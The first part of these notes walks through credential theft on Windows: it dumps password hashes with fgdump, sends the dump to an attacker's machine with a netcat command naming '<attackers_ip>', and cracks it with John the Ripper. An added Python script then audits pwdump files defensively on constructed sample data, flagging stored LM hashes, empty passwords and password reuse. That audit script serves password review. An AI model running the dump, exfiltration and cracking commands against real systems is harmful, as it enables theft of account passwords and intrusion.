Tools used: fgdump, John the Ripper
On target machine as Administrator:
C:\> fgdump.exe -c # dumps password hashes from the local Windows box to the file 127.0.0.1.pwdump
We use netcat to send the dumped hashes to the attacker's machine. On the attacker's machine:
$ nc -l -p 2222 > 127.0.0.1.pwdump # receive the dump under the same file name it has on the target
target machine:
C:\> nc <attackers_ip> 2222 < 127.0.0.1.pwdump
On attacker's machine:
$ ./john --session=recovery1 127.0.0.1.pwdump
We can stop the guessing session with ^C and resume it with:
$ ./john --session=recovery1
Pressing the spacebar shows the current recovery speed. Recovered passwords are stored in the john.pot file; to write them to a file of their own:
$ john --show 127.0.0.1.pwdump > 127.0.0.1.cracked.txt
This is the basic use case for recovering passwords. There is more to john (modes of operation, distributing the computation among several machines, optimizing the key space); more on that in future.
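The same pwdump file tells a defender a lot before any cracking happens. The following Python script is an added example, not part of the original notes or of fgdump/john: it parses the `user:RID:LMhash:NThash:::` lines fgdump writes and reports the three things a password audit cares about most, accounts whose LM hash is still stored (LM hashes are trivially recoverable, so NoLMHash should be enforced), accounts with an empty password, and accounts sharing one NT hash (password reuse). The empty-string LM and NT hash constants are public, well-known values; the sample dump, user names and hashes are constructed for the example.

```python
"""Audit a pwdump-format file (as written by fgdump) for weak hash storage.

Added example: parses the dump format and reports findings; it does not
crack anything. The SAMPLE dump below is constructed, not real data.
"""
from collections import defaultdict

# Well-known hashes of the empty string (public constants).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in pwdump layout: user:RID:LMhash:NThash:::
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:112233445566778899aabbccddeeff00:00112233445566778899aabbccddeeff:::
jdoe:1002:aad3b435b51404eeaad3b435b51404ee:ffeeddccbbaa99887766554433221100:::
"""


def is_hex_hash(value):
    """True for a 32-character hex string, i.e. a real LM/NT hash field."""
    return len(value) == 32 and all(c in "0123456789abcdef" for c in value)


def parse_pwdump(text):
    """Return one dict per well-formed line; blank, comment and short lines are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            continue  # malformed line: skip rather than abort the whole audit
        entries.append({
            "user": parts[0],
            "rid": parts[1],
            "lm": parts[2].strip().lower(),
            "nt": parts[3].strip().lower(),
        })
    return entries


def audit_pwdump(text):
    """Return {'lm_stored': [...], 'empty_password': [...], 'reused': {nt: [users]}}."""
    entries = parse_pwdump(text)
    findings = {"lm_stored": [], "empty_password": [], "reused": {}}
    by_nt = defaultdict(list)
    for e in entries:
        # An LM hash other than the empty-string hash means LM storage is still enabled.
        if is_hex_hash(e["lm"]) and e["lm"] != EMPTY_LM:
            findings["lm_stored"].append(e["user"])
        # The empty-string NT hash means the account has no password at all.
        if e["nt"] == EMPTY_NT:
            findings["empty_password"].append(e["user"])
        if is_hex_hash(e["nt"]) and e["nt"] != EMPTY_NT:
            by_nt[e["nt"]].append(e["user"])
    # Two accounts with the same NT hash share the same password.
    findings["reused"] = {h: users for h, users in by_nt.items() if len(users) > 1}
    return findings


def report(findings):
    """Human-readable summary; returns the number of distinct findings."""
    count = 0
    for user in findings["lm_stored"]:
        print(f"[LM hash stored]   {user}")
        count += 1
    for user in findings["empty_password"]:
        print(f"[empty password]   {user}")
        count += 1
    for h, users in findings["reused"].items():
        print(f"[password reuse]   {', '.join(users)} share NT hash {h[:8]}...")
        count += 1
    return count


if __name__ == "__main__":
    # Usage with a real dump: audit_pwdump(open("127.0.0.1.pwdump").read())
    report(audit_pwdump(SAMPLE))
```

Running it against the constructed sample flags `svc_backup` for LM storage, `Guest` for an empty password, and `Administrator` and `svc_backup` for sharing a password; the reuse check is the one worth running on every dump, since it costs nothing and needs no cracking at all.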